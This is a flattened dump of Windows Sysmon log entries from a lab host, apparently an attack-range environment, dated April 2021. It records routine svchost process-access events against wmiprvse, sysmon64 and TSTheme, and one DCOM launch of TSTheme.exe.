12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292111Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292110Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292109Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292108Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292107Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292106Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292105Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292104Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292103Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292102Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292101Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292100Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292099Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292098Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292097Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000292096Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.960{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{BEA10069-D0C2-6086-0C00-00000000BB01}728C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000292095Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.961{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292094Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.961{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292093Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.961{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292092Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.960{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1700-00000000BB01}1348C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292091Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.959{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292090Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.959{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292089Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.958{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292088Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.958{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292087Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 